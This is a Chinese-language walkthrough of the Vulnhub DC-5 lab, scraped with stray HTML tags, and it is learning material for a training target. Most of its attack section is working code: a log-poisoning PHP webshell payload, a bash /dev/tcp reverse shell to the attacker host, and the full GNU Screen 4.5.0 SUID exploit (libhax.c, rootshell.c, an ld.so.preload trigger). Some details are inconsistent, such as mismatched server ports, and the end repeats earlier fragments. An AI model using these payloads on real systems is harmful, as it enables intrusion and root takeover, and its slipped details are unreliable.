DC-5 靶机渗透测试完整复现教程<\/h1>

一、环境准备<\/h2>

靶机信息<\/h3>

靶机名称: DC-5 (来自Vulnhub)<\/li>
可能的IP地址: 192.168.200.11 或 192.168.200.58<\/li>

开放服务: HTTP (80端口), RPC (111端口), 其他(43853端口)<\/li> <\/ul>

攻击机信息<\/h3>

系统: Kali Linux<\/li>

IP地址: 192.168.200.14<\/li> <\/ul>

二、信息收集阶段<\/h2>

1. 主机发现<\/h3>

使用三种方法扫描网段内存活主机:<\/p>

# 方法1: arp-scan<\/span>
<\/span><\/span>arp-scan -l
<\/span><\/span>
<\/span><\/span># 方法2: nmap ping扫描<\/span>
<\/span><\/span>nmap -sP 192.168.200.0\/24 -T4
<\/span><\/span>
<\/span><\/span># 方法3: netdiscover<\/span>
<\/span><\/span>netdiscover -i eth0 -r 192.168.200.0\/24
<\/span><\/span><\/code><\/pre>2. 端口扫描与服务识别<\/h3>
# 基本扫描<\/span>
<\/span><\/span>nmap -sS -A 192.168.200.11 -p 1-65535
<\/span><\/span>
<\/span><\/span># 服务版本探测<\/span>
<\/span><\/span>nmap -sV -p- 192.168.200.11
<\/span><\/span><\/code><\/pre>扫描结果:<\/p>

80\/tcp: HTTP服务<\/li>
111\/tcp: RPC服务<\/li>
43853\/tcp: 未知服务<\/li>
<\/ul>
3. Web应用初步分析<\/h3>
访问网站发现每次刷新页面时，底部时间会变化，可能存在文件包含漏洞。<\/p>
4. 目录扫描<\/h3>
使用工具扫描网站目录，发现thankyou.php<\/code>文件包含footer.php<\/code>，进一步确认文件包含漏洞可能性。<\/p>
三、漏洞利用<\/h2>
1. 文件包含漏洞验证<\/h3>
尝试访问:<\/p>
http:\/\/192.168.200.11\/?file=\/etc\/passwd
<\/code><\/pre>
成功显示系统用户信息，确认存在文件包含漏洞。<\/p>
2. 通过Nginx日志获取Webshell<\/h3>
Nginx日志路径:<\/p>

\/var\/log\/nginx\/error.log<\/code><\/li>
\/var\/log\/nginx\/access.log<\/code><\/li>
<\/ul>
利用方法:<\/p>

通过Burp或直接URL访问将PHP代码写入日志<\/li>
示例Payload:<\/li>
<\/ol>
http:\/\/192.168.200.11\/?file=\/var\/log\/nginx\/access.log&cmd=<?php system($_GET['cmd']);?>
<\/code><\/pre>
3. 建立Webshell连接<\/h3>

在Kali上开启监听:<\/li>
<\/ol>
nc -lvnp 4444<\/span>
<\/span><\/span><\/code><\/pre>
通过蚁剑或直接使用Webshell执行反弹shell命令:<\/li>
<\/ol>
bash -c 'bash -i >& \/dev\/tcp\/192.168.200.14\/4444 0>&1'<\/span>
<\/span><\/span><\/code><\/pre>
升级交互式shell:<\/li>
<\/ol>
python -c 'import pty;pty.spawn("\/bin\/bash")'<\/span>
<\/span><\/span><\/code><\/pre>四、提权尝试<\/h2>
1. 查找SUID文件<\/h3>
find \/ -perm -u=<\/span>s -type f 2>\/dev\/null
<\/span><\/span><\/code><\/pre>发现screen-4.5.0<\/code>可能可利用。<\/p>
2. 利用GNU Screen漏洞<\/h3>

搜索相关漏洞:<\/li>
<\/ol>
searchsploit screen 4.5.0
<\/span><\/span><\/code><\/pre>
复制利用代码:<\/li>
<\/ol>
cp \/usr\/share\/exploitdb\/exploits\/linux\/local\/41154.sh 41154.sh
<\/span><\/span><\/code><\/pre>3. 编译利用代码<\/h3>
将利用脚本拆分为三部分:<\/p>
第一部分: libhax.c<\/strong><\/p>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <sys\/types.h><\/span>
<\/span><\/span><\/span>#include<\/span> <unistd.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>__attribute__ ((__constructor__))
<\/span><\/span>void<\/span> dropshell(void<\/span>){
<\/span><\/span>    chown("\/tmp\/rootshell"<\/span>, 0<\/span>, 0<\/span>);
<\/span><\/span>    chmod("\/tmp\/rootshell"<\/span>, 04755<\/span>);
<\/span><\/span>    unlink("\/etc\/ld.so.preload"<\/span>);
<\/span><\/span>    printf("[+] done!<\/span>\n<\/span>"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>编译:<\/p>
gcc -fPIC -shared -ldl -o libhax.so libhax.c
<\/span><\/span><\/code><\/pre>第二部分: rootshell.c<\/strong><\/p>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span><\/span>int<\/span> main<\/span>(void<\/span>){
<\/span><\/span>    setuid(0<\/span>);
<\/span><\/span>    setgid(0<\/span>);
<\/span><\/span>    seteuid(0<\/span>);
<\/span><\/span>    setegid(0<\/span>);
<\/span><\/span>    execvp("\/bin\/sh"<\/span>, NULL, NULL);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>编译:<\/p>
gcc -o rootshell rootshell.c
<\/span><\/span><\/code><\/pre>第三部分: DC-5.sh<\/strong><\/p>
#!\/bin\/bash
<\/span><\/span><\/span><\/span>echo "[+] Now we create our \/etc\/ld.so.preload file..."<\/span>
<\/span><\/span>cd \/etc
<\/span><\/span>umask 000<\/span> # because<\/span>
<\/span><\/span>screen -D -m -L ld.so.preload echo -ne "\x0a\/tmp\/libhax.so"<\/span> # newline needed<\/span>
<\/span><\/span>echo "[+] Triggering..."<\/span>
<\/span><\/span>screen -ls # screen itself is setuid, so...<\/span>
<\/span><\/span>\/tmp\/rootshell
<\/span><\/span><\/code><\/pre>4. 文件传输与执行<\/h3>

在Kali上启动HTTP服务:<\/li>
<\/ol>
python -m http.server 8899<\/span>
<\/span><\/span><\/code><\/pre>
在靶机上下载文件:<\/li>
<\/ol>
wget http:\/\/192.168.200.14:8888\/rootshell
<\/span><\/span>wget http:\/\/192.168.200.14:8888\/libhax.so
<\/span><\/span>wget http:\/\/192.168.200.14:8888\/DC-5.sh
<\/span><\/span><\/code><\/pre>
执行提权:<\/li>
<\/ol>
chmod +x DC-5.sh
<\/span><\/span>.\/DC-5.sh
<\/span><\/span><\/code><\/pre>5. 遇到的问题<\/h3>
执行时出现错误:<\/p>
glibc_2.34 not found
<\/code><\/pre>
可能是由于glibc版本不兼容导致提权失败。<\/p>
五、可能的解决方案<\/h2>


尝试其他提权方法:<\/p>

检查内核版本寻找本地提权漏洞<\/li>
查找其他SUID程序<\/li>
检查crontab任务<\/li>
<\/ul>
<\/li>

针对glibc问题的解决:<\/p>

尝试在靶机上静态编译利用代码<\/li>
寻找与靶机glibc版本兼容的利用代码<\/li>
<\/ul>
<\/li>

参考其他资源:<\/p>

CSDN相关文章<\/a><\/li>
<\/ul>
<\/li>
<\/ol>
六、总结<\/h2>
本教程详细记录了DC-5靶机的渗透过程，从信息收集到文件包含漏洞利用，再到提权尝试。虽然最后提权步骤遇到问题，但整个过程展示了完整的渗透测试思路和方法。对于遇到的glibc版本问题，需要进一步研究兼容性解决方案或寻找替代提权方法。<\/p>

DC-5 靶机渗透测试完整复现教程<\/h1>

一、环境准备<\/h2>

二、信息收集阶段<\/h2>

3. Web应用初步分析<\/h3> 访问网站发现每次刷新页面时，底部时间会变化，可能存在文件包含漏洞。<\/p>

4. 目录扫描<\/h3> 使用工具扫描网站目录，发现thankyou.php<\/code>文件包含footer.php<\/code>，进一步确认文件包含漏洞可能性。<\/p>

四、提权尝试<\/h2>

3. Web应用初步分析<\/h3>
访问网站发现每次刷新页面时，底部时间会变化，可能存在文件包含漏洞。<\/p>

4. 目录扫描<\/h3>
使用工具扫描网站目录，发现`thankyou.php<\/code>文件包含footer.php<\/code>，进一步确认文件包含漏洞可能性。<\/p>`